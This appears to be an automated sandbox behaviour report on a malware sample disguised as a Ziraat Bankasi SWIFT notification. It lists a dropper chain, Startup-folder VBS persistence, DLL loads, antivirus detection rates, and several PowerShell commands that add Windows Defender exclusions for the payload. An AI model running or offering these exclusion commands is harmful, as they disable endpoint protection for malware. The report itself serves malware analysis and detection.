Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Mutant created: \Sessions\1\BaseNamedObjects\XoFHv1TT4hWErxRo

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

File created: C:\Users\user\AppData\Local\Temp\aut9353.tmp

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\niellist.vbs"

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Virustotal: Detection: 79%
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe	ReversingLabs: Detection: 86%

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

File read: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe "C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe"
Source: unknown	Process created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
Source: unknown	Process created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Process created: C:\Users\user\AppData\Local\differences\niellist.exe "C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe"
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\XClient.exe "C:\Users\user\AppData\Local\Temp\XClient.exe"
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
Source: unknown	Process created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\niellist.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\differences\niellist.exe "C:\Users\user\AppData\Local\differences\niellist.exe"
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\differences\niellist.exe"
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\XClient.exe "C:\Users\user\AppData\Roaming\XClient.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\XClient.exe "C:\Users\user\AppData\Roaming\XClient.exe"
Source: unknown	Process created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
Source: unknown	Process created: C:\Windows\System32\msdtc.exe C:\Windows\System32\msdtc.exe
Source: unknown	Process created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
Source: unknown	Process created: C:\Windows\SysWOW64\perfhost.exe C:\Windows\SysWow64\perfhost.exe
Source: unknown	Process created: C:\Windows\System32\Locator.exe C:\Windows\system32\locator.exe
Source: unknown	Process created: C:\Windows\System32\SensorDataService.exe C:\Windows\System32\SensorDataService.exe
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Process created: C:\Users\user\AppData\Local\differences\niellist.exe "C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\XClient.exe "C:\Users\user\AppData\Local\Temp\XClient.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\differences\niellist.exe "C:\Users\user\AppData\Local\differences\niellist.exe"
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\differences\niellist.exe"

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: drprov.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ntlanman.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: davclnt.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: davhlpr.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: browcli.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: msvcp140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: mswsock.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: dbghelp.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: mpr.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: secur32.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: mpr.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: secur32.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
